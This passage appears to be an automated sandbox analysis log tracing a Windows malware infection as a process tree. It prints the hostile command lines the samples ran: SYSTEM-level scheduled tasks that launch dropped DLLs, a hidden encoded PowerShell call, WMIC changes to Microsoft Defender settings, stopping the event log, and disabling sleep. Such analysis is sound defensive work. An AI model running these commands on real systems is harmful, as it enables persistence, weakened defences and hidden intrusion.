[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "wHxxZovhMVeXN2" /F /xml "C:\ProgramData\ERCUCymjGgNKOwVB\ewzluku.xml" /RU "SYSTEM"
- Scheduled Task/Job: Scheduled Task
PID:3552
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "YEzBJjbnitNtrmmkX2" /F /xml "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\ZcvXHny.xml" /RU "SYSTEM"
- Scheduled Task/Job: Scheduled Task
PID:5152
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "XgFMMTvgqSOFYnnQAbZ2" /F /xml "C:\Program Files (x86)\qioMUrUoKCErC\uXNJzhu.xml" /RU "SYSTEM"
- Scheduled Task/Job: Scheduled Task
PID:1212
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "ZNzITvxeQRflwsDJD" /SC once /ST 21:55:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll\",#1 /jXdidYkG 385132" /V1 /F
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4552
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "ZNzITvxeQRflwsDJD"  PID:5580
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /CREATE /TN "dyrOw1" /SC once /ST 11:40:31 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
- Scheduled Task/Job: Scheduled Task
PID:2252
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /run /I /tn "dyrOw1"  PID:5472
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "dyrOw1"  PID:4012
[depth 2] C:\Windows\SysWOW64\schtasks.exe  schtasks /DELETE /F /TN "LOHPKuWKJcOzSYPZu"  PID:2060
[depth 2] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 2344
- Program crash
PID:664
[depth 1] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5204 -ip 5204  PID:5560
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:5844 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5972
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5884
-
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exeC:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe MC /pTOFdidyt 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:648 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"2⤵PID:5884
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:5988
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:1952
-
-
-
-
-
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\CUgSrT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:3156
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\tKdeIZH.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task
    PID:560
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "JHXYugTugXnbcjp"
    PID:6020
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "JHXYugTugXnbcjp"
    PID:5296
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\IGnJJps.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task
    PID:1156
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\pisCgeC.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task
    PID:5224
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\nUdthBM.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task
    PID:1376
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\mOuiFMl.xml" /RU "SYSTEM"
    - Scheduled Task/Job: Scheduled Task
    PID:2640
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "TEcaJ1" /SC once /ST 20:23:27 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
    - Scheduled Task/Job: Scheduled Task
    PID:3656
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "TEcaJ1"
    PID:5984
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "TEcaJ1"
    PID:1904
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"
    PID:4644
  C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 2060
    - Program crash
    PID:2044
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5180 -ip 5180
  PID:2060
C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll",#1 /jXdidYkG 385132
  PID:6056
  C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll",#1 /jXdidYkG 385132
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Enumerates system info in registry
    PID:5252
    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "ZNzITvxeQRflwsDJD"
      PID:5728
C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  PID:4044
  C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Checks processor information in registry
    PID:5356
C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  PID:5640
  C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:5032
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 24929 -prefMapSize 245222 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6f3aba9-5fff-4aa8-b447-34fc2f87b3a5} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" gpu
      PID:4616
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20240401114208 -prefsHandle 2264 -prefMapHandle 2260 -prefsLen 24965 -prefMapSize 245222 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f1689bc-4897-4605-826f-9715bb90d11f} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" socket
      - Checks processor information in registry
      PID:6076
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3728 -childID 1 -isForBrowser -prefsHandle 3720 -prefMapHandle 3716 -prefsLen 25106 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {238abdea-82e9-45c4-a6ab-9898d696c075} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:3836
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3556 -childID 2 -isForBrowser -prefsHandle 3612 -prefMapHandle 3644 -prefsLen 29399 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f73b8942-cd6f-4801-95da-6403406815d0} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:2040
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4364 -childID 3 -isForBrowser -prefsHandle 4356 -prefMapHandle 4352 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6895749b-7eb4-4273-b6ba-82eaa1f0fbec} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:5132
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4952 -prefMapHandle 4948 -prefsLen 30404 -prefMapSize 245222 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c7c6948-f0cf-4154-9583-f1e52c2cb1da} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" utility
      - Checks processor information in registry
      PID:4796
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4576 -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 4592 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e344de7c-1591-4600-83d0-4eee22333ac4} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:5416
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 5 -isForBrowser -prefsHandle 5764 -prefMapHandle 5760 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {430df9d4-b43c-4cf3-b205-4d2c59f39f89} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:5316
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4464 -childID 6 -isForBrowser -prefsHandle 6036 -prefMapHandle 6032 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c1d4f80-52e9-4d03-9bee-4434c5273376} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:5728
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5928 -childID 7 -isForBrowser -prefsHandle 4464 -prefMapHandle 4428 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ace4c4d-14d3-4ce2-ae04-54a4fb0de52c} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:5624
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6268 -childID 8 -isForBrowser -prefsHandle 6244 -prefMapHandle 6248 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c475d5d-216a-4f8b-b4b4-ac61415c7766} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:6008
    C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6084 -childID 9 -isForBrowser -prefsHandle 6100 -prefMapHandle 6096 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11cf2f32-c7da-407c-ad29-8a84c3dd0aae} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
      PID:5324
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5104 -ip 5104
  PID:3188
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6072 -ip 6072
  PID:5004
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1492 -ip 1492
  PID:1528
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 648 -ip 648
  PID:1104
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3512
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5528
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3480
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5692
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5240
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6004
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5308
C:\Users\Admin\Desktop\Setup.exe
  "C:\Users\Admin\Desktop\Setup.exe"
  - Modifies firewall policy service
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:4044
  C:\Users\Admin\Documents\SimpleAdobe\abQaeBLwmX9V57tLKTE3eOuX.exe
    C:\Users\Admin\Documents\SimpleAdobe\abQaeBLwmX9V57tLKTE3eOuX.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3580
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      PID:5492
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      - Checks processor information in registry
      - Suspicious use of SetWindowsHookEx
      PID:1496
  C:\Users\Admin\Documents\SimpleAdobe\6_8BpX05xBxPNdxoMR3fjLwI.exe
    C:\Users\Admin\Documents\SimpleAdobe\6_8BpX05xBxPNdxoMR3fjLwI.exe
    - Executes dropped EXE
    PID:1868
    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      - Power Settings
      PID:5560
    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      - Power Settings
      PID:3980
    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      - Power Settings
      PID:2636
    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      - Power Settings
      PID:3680
    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      - Launches sc.exe
      PID:5480
    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "CIFUBVHI"
      - Launches sc.exe
      PID:2348
  C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe
    C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6036
    C:\Users\Admin\AppData\Local\Temp\is-NQPM2.tmp\av_cOAXWNrelQa039CGbm0A1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NQPM2.tmp\av_cOAXWNrelQa039CGbm0A1.tmp" /SL5="$80242,5424534,54272,C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetWindowsHookEx
      PID:1784
  C:\Users\Admin\Documents\SimpleAdobe\4Iy1KUXaumS5KWIhCg2YizTi.exe
    C:\Users\Admin\Documents\SimpleAdobe\4Iy1KUXaumS5KWIhCg2YizTi.exe
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:5448
  C:\Users\Admin\Documents\SimpleAdobe\kJjL0w6C70s0bwCeRI5o95qa.exe
    C:\Users\Admin\Documents\SimpleAdobe\kJjL0w6C70s0bwCeRI5o95qa.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5832
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      - Checks processor information in registry
      - Suspicious use of SetWindowsHookEx
      PID:2236
  C:\Users\Admin\Documents\SimpleAdobe\IRrr6YljmO8hEIxi45BS9F3G.exe
    C:\Users\Admin\Documents\SimpleAdobe\IRrr6YljmO8hEIxi45BS9F3G.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4912
  C:\Users\Admin\Documents\SimpleAdobe\cRS5O_os57KVEKl2I6n_mlOZ.exe
    C:\Users\Admin\Documents\SimpleAdobe\cRS5O_os57KVEKl2I6n_mlOZ.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5504
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      - Suspicious use of SetWindowsHookEx
      PID:1612
  C:\Users\Admin\Documents\SimpleAdobe\sxM96ISlNbOtGCb6tmhTPqMM.exe
    C:\Users\Admin\Documents\SimpleAdobe\sxM96ISlNbOtGCb6tmhTPqMM.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:2364
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious use of SetWindowsHookEx
      PID:3020
  C:\Users\Admin\Documents\SimpleAdobe\7NybowgkTtFNZ6zV5tAShfiu.exe
    C:\Users\Admin\Documents\SimpleAdobe\7NybowgkTtFNZ6zV5tAShfiu.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:6048
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - Suspicious use of SetWindowsHookEx
      PID:2956
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID:2820
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID:6016
C:\Users\Admin\Desktop\Setup.exe
  "C:\Users\Admin\Desktop\Setup.exe"
  - Suspicious use of SetWindowsHookEx
  PID:2672
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1548
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
  C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
  - Executes dropped EXE
  PID:5108
  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    - Power Settings
    PID:5400
  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    - Power Settings
    PID:5204
  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    - Power Settings
    PID:1220
  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    - Power Settings
    PID:2800
C:\Users\Admin\Desktop\Setup.exe
  "C:\Users\Admin\Desktop\Setup.exe"
  - Modifies firewall policy service
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:940
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID:5024
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1892
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1304
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1848
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4896
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:976
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2016
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6036
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6016
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4948
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2836
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5324
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3324
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
